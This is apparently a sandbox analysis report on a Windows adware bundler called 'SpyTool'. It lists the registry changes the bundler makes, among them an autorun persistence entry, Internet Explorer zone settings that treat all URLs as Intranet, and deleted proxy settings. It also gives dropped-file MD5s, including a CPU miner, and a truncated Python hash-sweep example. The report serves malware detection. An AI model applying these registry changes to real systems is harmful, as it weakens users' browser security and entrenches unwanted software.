[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\CrossBrowser]
"Installation" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 0E 1C 6F AE 6F 59 22 EF 92 79 F2 84 4F 1B F0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool modifies IE security-zone settings so that all local web-nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security-zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The SpyTool deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process encrypt.exe:644 makes changes in the system registry.
The SpyTool creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "41 62 35 BD 22 7B 4E E7 EE C5 D9 D2 EF 20 5F 41"
The process encrypt.exe:1796 makes changes in the system registry.
The SpyTool creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E DC FA EB 29 06 C3 B3 66 63 05 85 1C 2B D5 8D"
The process encrypt.exe:1900 makes changes in the system registry.
The SpyTool creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 E5 82 6C 0B 1D 87 48 8F E6 ED DA ED BF 44 FA"
The process encrypt.exe:1484 makes changes in the system registry.
The SpyTool creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA AA F0 DD CD DA 79 2F 79 DF 9C B8 88 72 B5 14"
The process upgmsd_re_005010082.exe:380 makes changes in the system registry.
The SpyTool creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 25 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Tutorials\updatetutorialeshp]
"Version" = "gmsd_re_005010082"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Tutorials]
"HostGUID" = "4D9487DA-C20F-42AA-8C08-26CD204C8AD0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 98 79 30 F3 6F 9A 12 BF D1 3F EE 0D E9 2D F0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Tutorials\updatetutorialeshp]
"MainDir" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010082"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool modifies IE security-zone settings so that all local web-nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security-zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To run itself automatically each time Windows boots, the SpyTool adds a link to its file under the following system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010082.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010082\upgmsd_re_005010082.exe -runhelper"
The SpyTool deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsd33.tmp:432 makes changes in the system registry.
The SpyTool creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F 6E BD 6C 1D DB DB 9D 8A 27 09 72 FF B9 3B 3E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security-zone settings so that all local web-nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security-zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nskA.tmp:1676 makes changes in the system registry.
The SpyTool creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C B6 A3 70 70 DE E3 EA 4E 9A 1E CD 58 B6 26 88"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security-zone settings so that all local web-nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security-zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsc14.tmp:1452 makes changes in the system registry.
The SpyTool creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 A5 82 D7 D2 7E CB 01 97 4D A3 35 9E F3 36 DB"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-som-tot-cpm-opw-crb-crr"
Dropped PE files
MD5 | File path |
---|---|
9dcf0acd82ac35d87c4736b5759dbed5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\gmsd_re_005010082\upgmsd_re_005010082.exe |
cbcbe1f76f434a3b41c0148b62e6fbff | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2835.exe |
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\3290\setup.exe |
2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uninstall.exe |
c0157ad57d34d1d608adea523b228266 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\bitool.dll |
20f288aa7d995a4bfcb240b66383ebf4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsc43.tmp |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg2E.tmp\Registry.dll |
8a77f074c6628b81f94e144784f32adb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh37.tmp |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi32.tmp\Registry.dll |
40f572954315a15187b4db88207eff21 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nskA.tmp |
f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsl10.tmp\inetc.dll |
af9ca50f59a20b145c7b00ca8f7c63cc | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn4.tmp |
0116a50101c4107a138a588d1e46fca5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nso46.tmp\Banner.dll |
b140459077c7c39be4bef249c2f84535 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nso46.tmp\Math.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nso46.tmp\System.dll |
e541458cfe66ef95ffbea40eaaa07289 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nso46.tmp\inetc.dll |
0745ff646f5af1f1cdd784c06f40fce9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nso46.tmp\md5dll.dll |
c10e04dd4ad4277d5adc951bb331c777 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nso46.tmp\nsDialogs.dll |
42df1fbaa87567adf2b4050805a1a545 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nso46.tmp\xml.dll |
f9a709bbecced10d4a84f93c75604e04 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss2A.tmp |
fce81f5d5e6baabe8eb9f87a1bb3599c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu1B.tmp |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx3B.tmp\Registry.dll |
e7bf0b4417fa8afc5dbb90c1c9f9ecb8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz48.tmp |
8a77f074c6628b81f94e144784f32adb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_CPUminer[1].exe |
f9a709bbecced10d4a84f93c75604e04 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe |
cbcbe1f76f434a3b41c0148b62e6fbff | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup[1].exe |
e7bf0b4417fa8afc5dbb90c1c9f9ecb8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup[2].exe |
20f288aa7d995a4bfcb240b66383ebf4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\smt[1].exe |
b638732ad509ece4839c3329584ea42b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\36e0f22eacad857de2cd3b76aedc24a7[1].exe |
c0157ad57d34d1d608adea523b228266 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\BiTool[1].dll |
f77f6b517cf2e893cfcb107444f14495 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\df4a6a3ed77e60d6758afca091ca0c1f[1].exe |
ceea099a2589b086940ea7e1333a3ad9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\cmmdWriter[1].exe |
c1a6ac14dc23a321fd7de2c9b1fb8aa6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup_gmsd_re[1].exe |
ad3ce40da858a76f235974af46c18365 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7121923af824073a25b2b7e6ba0a6e0e[1].exe |
5c9336efb1faf577655bcd88a444c26b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\VISWHQk[1].exe |
2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Validate[1].exe |
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe |
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe |
e6b0bc04dca07169abfc4456c4671307 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\PepperFlash\pepflashplayer.dll |
0bcd0698977726a660321b4fec8f4a5e | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome.dll |
6d64fd7d8a69a39ed4ddcf0cd8d26b4b | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_child.dll |
72f70472e350b35290839f3e2802b4f4 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_elf.dll |
c81e0c917d5db4fecd2ec3c7e2712bbf | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\d3dcompiler_46.dll |
634ec1dc874c89711b94b5c279987d66 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe |
6e98034de60d2e96b4bbb148bbeabadb | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\ffmpegsumo.dll |
17baa5fcf3b9206cc0395a7cc38be7ac | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libegl.dll |
2b8929f7edc2df8925066cb0e7067365 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libexif.dll |
a25f20a5664891bc292970bd23acbf21 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libglesv2.dll |
302f011627a16ce5555e39ec53d4fbdd | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\metro_driver.dll |
814cb49f7706f681723ea9b5746987e4 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\nacl64.exe |
90871478e7b9765cccb884751bfafc7b | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\pdf.dll |
4120c792ee30c922d95c5201cedade29 | c:\Program Files\MyBrowser\MyBrowser\Application\mybrowser.exe |
cbcbe1f76f434a3b41c0148b62e6fbff | c:\Program Files\MyBrowser\MyBrowser\Application\utility.exe |
fb5ec0a6cbe2673c804cd8775211aaf2 | c:\Program Files\gmsd_re_005010082\gamesdesktop_widget.exe |
575674a22e3e25641c1cf0eff4bf4aec | c:\Program Files\gmsd_re_005010082\gmsd_re_005010082.exe |
0f24cc698735914b57dceaacd83487a3 | c:\Program Files\gmsd_re_005010082\predm.exe |
0ff72e16329a69960686a61ea9943c1d | c:\Program Files\gmsd_re_005010082\unins000.exe |
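Because the NSIS temp names (nsXX.tmp) and Content.IE5 cache folders differ on every run, the stable indicator in the table above is the MD5, and several rows share one hash under different names (8a77f074... is both nsh37.tmp and Bundle_CPUminer[1].exe; 2b7007ed... is Registry.dll three times). The Python below is an added example, not code from the report: it builds a hash index from rows in the table's `md5 | path |` layout and sweeps a directory tree for files whose MD5 matches. `SAMPLE_TABLE` is a subset of rows copied from the table; `demo_scan` writes constructed files to a temporary directory and adds their hash as a constructed indicator so the sweep can be exercised without a real sample on disk.

```python
"""Hash-based sweep for the dropped PE files in a sandbox report.
Added example, not report tooling: the "MD5 | File path |" rows become a
hash index, and a directory tree is walked for files whose MD5 matches."""
import hashlib
import os
import re
import tempfile
from typing import Dict, List, Tuple

HEX32 = re.compile(r"[0-9a-f]{32}")

# Subset of rows copied from the report's "Dropped PE files" table.  The same
# hash appears under several names, which is why the hash, not the path,
# is what gets matched.
SAMPLE_TABLE = r"""
MD5 | File path |
---|---|
9dcf0acd82ac35d87c4736b5759dbed5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\gmsd_re_005010082\upgmsd_re_005010082.exe |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg2E.tmp\Registry.dll |
8a77f074c6628b81f94e144784f32adb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh37.tmp |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi32.tmp\Registry.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx3B.tmp\Registry.dll |
8a77f074c6628b81f94e144784f32adb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_CPUminer[1].exe |
4120c792ee30c922d95c5201cedade29 | c:\Program Files\MyBrowser\MyBrowser\Application\mybrowser.exe |
575674a22e3e25641c1cf0eff4bf4aec | c:\Program Files\gmsd_re_005010082\gmsd_re_005010082.exe |
"""


def parse_dropped_table(text: str) -> Dict[str, List[str]]:
    """Map lower-case MD5 -> reported paths.  Header, separator and blank
    rows are dropped because their first cell is not a 32-digit hex string."""
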